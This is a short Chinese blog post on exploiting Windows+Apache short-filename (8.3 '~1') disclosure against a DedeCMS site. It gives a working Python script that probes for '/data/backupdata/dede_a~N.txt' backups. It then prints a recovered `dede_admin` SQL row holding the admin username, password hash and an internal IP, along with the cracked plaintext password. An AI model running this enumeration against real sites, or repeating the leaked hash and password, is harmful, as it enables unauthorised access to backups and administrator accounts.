MENU

Windows+Apache短文件名利用

January 14, 2019 • 信息安全阅读设置

根据短文件名的漏洞利用方式:

只有前六位字符直接显示,后续字符用~1指代。其中数字1还可以递增,如果存在多个文件名类似的文件(名称前6位必须相同,且后缀名前3位必须相同)。后缀名最长只有3位,多余的被截断。

Python简单检查漏洞脚本

import requests
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"}
url='http://www.url.com'
exp='/data/backupdata/dede_a~'
for i in range(10):
    urls = url + exp + str(i) + '.txt'
    res = requests.get(urls,headers=headers,timeout=4)
    code = res.status_code
    if code == 200:
        print('存在-->' + urls)

QQ图片20190114201139.png

可以找到3条记录
2924721421.png

INSERT INTO `dede_admin` VALUES('1','10','admin','c45fb146c78333b663a3','admin','','','','1578348516','172.16.2.221');

在dede_a~2.txt这条发现了管理员账号密码
3.png

解密后密码为sz19950721

Last Modified: February 10, 2019